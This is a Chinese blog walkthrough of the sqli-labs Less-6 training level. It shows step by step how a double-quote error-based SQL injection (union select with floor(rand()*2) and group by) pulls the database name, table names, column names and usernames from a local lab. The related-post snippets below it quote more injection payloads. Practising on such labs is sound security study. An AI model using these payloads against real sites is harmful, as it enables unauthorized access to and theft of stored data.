sqli-labs(6)

最新推荐文章于 2024-02-20 19:51:39 发布
最新推荐文章于 2024-02-20 19:51:39 发布
阅读量102 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/-zhong/p/10899535.html
版权

双注入GET双引号字符型注入

0x01(这里思路和05一样只是单引号变成了双引号)

首先我们看见这个网站 又是不显示值的 所以想到用报错的信息来得出你想要的结果

有了思路之后来试试一下吧

先填入单引号发现别没有报错 那双引号呐? 这里报错了 证明这里的闭合有“”闭合

那好咯 我们试试昨天的单引号那招 先尝试一下爆破当前数据库名称

http://127.0.0.1/sql1/Less-6/?id=1%22%20union%20select%20null,count(*),concat((select%20database()),%20floor(rand()*2))as%20a%20from%20information_schema.schemata%20group%20by%20a%23

 

 

成功的从报错信息里面得知 当前的数据库名称是security

那接下来有了数据库名称就是爆破当前数据库的表名了 那该怎么办呐?思路和昨天的一样 用limit函数绕过他的显示过滤

http://127.0.0.1/sql1/Less-6/?id=1%22%20union%20select%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),%20floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

这里看见我们报错了第一个表的名称

当然我们可以得出第二个表的名称 就是改一下limit参数 x,1 x代表你要查的是第几个表名 这里在第四个表看见了users

http://127.0.0.1/sql1/Less-6/?id=1%22%20union%20select%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%203,1),%20floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

这里从我们的mysql里面也是看见的只有四个表

那就继续快乐下去 爆列名 我们此时觉得uesrs表里面有关键的信息 那就爆破一下

http://127.0.0.1/sql1/Less-6/?id=1%22%20union%20select%20null,count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1),%20floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

这里我们就不一个一个爆破演示了 因为我们知道有username password这些列 所以直接爆字段就行

这里我们还是用自己的方法爆破字段名 网上的方法我用元语句执行好像行不通

http://127.0.0.1/sql1/Less-6/?id=1%22%20union%20select%20null,count(*),concat((select%20username%20from%20users%20limit%201,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

得到你想要的数据

切记 少就是多 慢就是快  加油

转载于:https://www.cnblogs.com/-zhong/p/10899535.html

weixin_30685029
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs(4)
jimggg的博客
03-18 145
")闭合 拿sqlmap跑一下,发现是“)闭合 验证一下 http://192.168.1.21/sqli-labs-master/Less-4/?id=1") and 1=1–+ http://192.168.1.21/sqli-labs-master/Less-4/?id=1") and 1=2–+ 剩下的应该跟第3题一毛一样了 列查询order by,发现是3, http://192....
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQL注入之sqli-labs(六)
m0_60716947的博客
04-27 448
(一)第二十九关到三十一关 这里只有这三关的笔记是因为这三关比较特殊,所以单独拿出来做笔记。 (1)搭建jsp环境 首先我们先打开29关,进行简单的注入,发现步骤和第一关几乎一模一样,可是这是不可能的,我们先打开网站,看到这关的标题为:被世界上最好的waf防护着。也可以证实这关并不是这样的。其实这关实在jsp环境下以来运行的。 我们首先打开sqli-labs的根目录,在目录最下方发现一个压缩包 就是这关tomcat-files,我们将他提取出来 这里面才是真正的第二十九关,然后.
sqli-labs通关攻略教程六(less26~less28a)
m0_55854679的博客
07-21 830
less 26 方法1 由题目可知,本题绕过了空格和注释,注释符用|| '1'='1或者;%00绕过。 空白符绕过 (1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/ (2)正则空白符:%09、%0A、%0B、%0D、%20 25%为百分号,%25A0就是空白符 绕开空格 %09——TAB键(水平) %0a——新建一行 %0c——新的一页 %0d return 功能 %0b——TAB键(垂直) %a0——空格 由源码可知,题目还将and、or等下列
sqlilabs_6
ZERO_zero_0的博客
07-08 209
sqlilabs_6
Sqli-labs靶场第6关详解[Sqli-labs-less-6]
最新发布
m0_73615178的博客
02-20 1262
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——报错注入(Error-based)
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 2792
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs.rar
12-22
6. 修改配置:打开`sqli-labs`文件夹中的`config.inc.php`,将数据库连接信息(如数据库名、用户名、密码)更新为实际值。 7. 访问sqli-labs:在浏览器中输入`http://localhost/sqli-labs/`,如果一切正常,你应该能...
Sqlilabs-6
KAKA的博客
07-06 855
第 6 关跟第 5 关一样,只不过是单引号换成了双引号而已 构造 ID 后,显示的内容为:You are in… http://sqlilabs/Less-6/?id=1 回显正常 http://sqlilabs/Less-6/?id=1' 回显正常 http://sqlilabs/Less-6/?id=1" 回显正常 http://sqlilabs/Less-6/?id=1"--+ 回显正常 因为正常时返回的内容为 You are in…无法从返回结果
Sqli-labs less 6
lixiangminghate的专栏
06-23 552
转自:lcarmyLess6与less5的区别在于less6在id参数传到服务器时,对id参数进行了处理。这里可以从源代码中可以看到。id=′"′.id=′"′.id.'"';sql="SELECT∗FROMusersWHEREid=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1";那我们在这一关的策略和less5的是一样的。只需要将 ' 替换成 " .这里我们...
sqli注入--利用information_schema配合双查询报错注入
weixin_30779691的博客
01-18 303
目录 sqli-labs 5、6双查询报错注入通关 0x01 获取目标库名 0x02 获取库中表的数量 0x03 获取库中表名 0x04 获取目标表中的列数 0x05 获取目标表的列名 0x06 从列中获取用户名 0x07 获取对应的...
Sqli-labs6-10 盲注、基于时间,基于报错(附脚本)
Recar的博客
12-13 2668
第六题 双引号双注入和第五题一样的界面单引号,不报错,使用双引号 报错http://localhost/sqli-labs/Less-6/?id=-1"; union select 1 from(select count(*),concat_ws(':',(select version()),floor(rand(0)*2))a from information_schema.tables gro
sqli-labs系列——第六关
茶寂的博客
01-15 2281
less6 这个本质上跟第五关相同都是使用报错注入,这一关使用的是双引号闭合 还是使用updatexml()这个函数 ?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库名: ?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表名: ?id=1" union select updatexml(1,con
Sqli-Labs之less-6
ISNS的博客
02-09 699
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 我们可以看到less-6的题目提示: 得知这道题是“双注入-双引号-字符型”。 所以,这道题的除了判断注入点时是【"–+】以外,其余的解题步骤和less-5是一模一样的! 完整过程详见: Sqli-Labs之less-5(双注入解法) 最后的结果是: ...
sqli-labs————less6
Fly_鹏程万里
05-09 559
Less 6源码:主要代码:$id = '"'.$id.'"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql);从以上代码中可以中看看,这里我们可以将“‘  ”替换为“ "  ”,之后的语句正常构造就好:这里简单演示一个猜解数据库版本信息的:猜解数据库的第一个字符:之后的内容与之前在less...
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值